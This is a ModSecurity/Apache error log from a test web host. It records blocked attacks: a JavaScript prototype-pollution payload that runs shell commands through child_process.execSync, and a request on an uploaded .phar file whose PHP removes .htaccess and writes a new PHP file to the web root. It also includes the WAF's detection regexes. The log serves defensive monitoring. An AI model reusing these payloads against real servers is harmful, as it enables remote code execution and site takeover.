[Thu Jan 22 16:48:25.059172 2026] [:error] [pid 1574705] [client 46.146.233.94:48044] [client 46.146.233.94] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGycD7n0ZSnusnw3iYfwAAAAY"]
[Thu Jan 22 16:48:25.060525 2026] [:error] [pid 1574705] [client 46.146.233.94:48044] [client 46.146.233.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGycD7n0ZSnusnw3iYfwAAAAY"]
[Thu Jan 22 16:48:25.060693 2026] [:error] [pid 1574705] [client 46.146.233.94:48044] [client 46.146.233.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGycD7n0ZSnusnw3iYfwAAAAY"]
[Thu Jan 22 16:48:26.651107 2026] [:error] [pid 1576471] [client 46.146.233.94:51382] [client 46.146.233.94] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((6 7))test).tostring() })() throw object.assign(new error(next_redirect) {digest:`next_redirect push/x?d=${encodeuricomponent(string(res)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(echo ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGyqukQpqT0S6ULsLoyAAAAAg"]
[Thu Jan 22 16:48:26.651481 2026] [:error] [pid 1576471] [client 46.146.233.94:51382] [client 46.146.233.94] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGyqukQpqT0S6ULsLoyAAAAAg"]
[Thu Jan 22 16:48:26.651533 2026] [:error] [pid 1576471] [client 46.146.233.94:51382] [client 46.146.233.94] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6 7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGyqukQpqT0S6ULsLoyAAAAAg"]
[Thu Jan 22 16:48:26.652837 2026] [:error] [pid 1576471] [client 46.146.233.94:51382] [client 46.146.233.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGyqukQpqT0S6ULsLoyAAAAAg"]
[Thu Jan 22 16:48:26.653016 2026] [:error] [pid 1576471] [client 46.146.233.94:51382] [client 46.146.233.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXJGyqukQpqT0S6ULsLoyAAAAAg"]
[Fri Jan 23 01:27:01.908545 2026] [:error] [pid 1593968] [client 91.98.201.248:49188] [client 91.98.201.248] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${encodeuricomponent(string(res))} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(uname -m).tostring() })() throw object.assign(..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVRzwxNkAoVEa3LeTzgAAAAc"]
[Fri Jan 23 01:27:01.909005 2026] [:error] [pid 1593968] [client 91.98.201.248:49188] [client 91.98.201.248] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVRzwxNkAoVEa3LeTzgAAAAc"]
[Fri Jan 23 01:27:01.910323 2026] [:error] [pid 1593968] [client 91.98.201.248:49188] [client 91.98.201.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVRzwxNkAoVEa3LeTzgAAAAc"]
[Fri Jan 23 01:27:01.910499 2026] [:error] [pid 1593968] [client 91.98.201.248:49188] [client 91.98.201.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVRzwxNkAoVEa3LeTzgAAAAc"]
[Fri Jan 23 01:27:02.121542 2026] [:error] [pid 1593965] [client 91.98.201.248:49198] [client 91.98.201.248] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((6 7))test).tostring() })() throw object.assign(new error(next_redirect) {digest:`next_redirect push/x?d=${encodeuricomponent(string(res)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(echo ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVkiWoxSrpz_Eu44QxgAAAAE"]
[Fri Jan 23 01:27:02.121968 2026] [:error] [pid 1593965] [client 91.98.201.248:49198] [client 91.98.201.248] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVkiWoxSrpz_Eu44QxgAAAAE"]
[Fri Jan 23 01:27:02.122022 2026] [:error] [pid 1593965] [client 91.98.201.248:49198] [client 91.98.201.248] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6 7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVkiWoxSrpz_Eu44QxgAAAAE"]
[Fri Jan 23 01:27:02.123494 2026] [:error] [pid 1593965] [client 91.98.201.248:49198] [client 91.98.201.248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVkiWoxSrpz_Eu44QxgAAAAE"]
[Fri Jan 23 01:27:02.123691 2026] [:error] [pid 1593965] [client 91.98.201.248:49198] [client 91.98.201.248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXLAVkiWoxSrpz_Eu44QxgAAAAE"]
[Fri Jan 23 06:14:04.435204 2026] [:error] [pid 1596303] [client 188.68.37.159:57940] [client 188.68.37.159] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${encodeuricomponent(string(res))} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}} found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(uname -m).tostring() })() throw object.assign(..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnGMtiljrXZ04d2upaQAAAAE"]
[Fri Jan 23 06:14:04.435609 2026] [:error] [pid 1596303] [client 188.68.37.159:57940] [client 188.68.37.159] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('uname -m').toString..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnGMtiljrXZ04d2upaQAAAAE"]
[Fri Jan 23 06:14:04.436964 2026] [:error] [pid 1596303] [client 188.68.37.159:57940] [client 188.68.37.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnGMtiljrXZ04d2upaQAAAAE"]
[Fri Jan 23 06:14:04.437140 2026] [:error] [pid 1596303] [client 188.68.37.159:57940] [client 188.68.37.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnGMtiljrXZ04d2upaQAAAAE"]
[Fri Jan 23 06:14:04.511138 2026] [:error] [pid 1596302] [client 188.68.37.159:57948] [client 188.68.37.159] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((6 7))test).tostring() })() throw object.assign(new error(next_redirect) {digest:`next_redirect push/x?d=${encodeuricomponent(string(res)) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=(function(){var _r=typeof require!==undefined?require:(process.mainmodule?process.mainmodule.require.bind(process.mainmodule):(typeof globalthis.require!==undefined?globalthis.require:null)) return _r(child_process).execsync(echo ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnJite9JzWUqbvEywcQAAAAA"]
[Fri Jan 23 06:14:04.511500 2026] [:error] [pid 1596302] [client 188.68.37.159:57948] [client 188.68.37.159] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6+7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnJite9JzWUqbvEywcQAAAAA"]
[Fri Jan 23 06:14:04.511551 2026] [:error] [pid 1596302] [client 188.68.37.159:57948] [client 188.68.37.159] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: function(){ found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=(function(){var _r=typeof require!=='undefined'?require:(process.mainModule?process.mainModule.require.bind(process.mainModule):(typeof globalThis.require!=='undefined'?globalThis.require:null));return _r('child_process').execSync('echo TEST$((6 7))TE..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnJite9JzWUqbvEywcQAAAAA"]
[Fri Jan 23 06:14:04.512842 2026] [:error] [pid 1596302] [client 188.68.37.159:57948] [client 188.68.37.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnJite9JzWUqbvEywcQAAAAA"]
[Fri Jan 23 06:14:04.513010 2026] [:error] [pid 1596302] [client 188.68.37.159:57948] [client 188.68.37.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXMDnJite9JzWUqbvEywcQAAAAA"]
[Fri Jan 23 16:28:42.159512 2026] [:error] [pid 1596304] [client 185.65.202.110:59198] [client 185.65.202.110] ModSecurity: Rule 7fc31f89dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/8/t888364f428d25.phar"] [unique_id "aXOTqjhDL5QTdZ-T3ORXhwAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 23 16:28:42.159975 2026] [:error] [pid 1596304] [client 185.65.202.110:59198] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 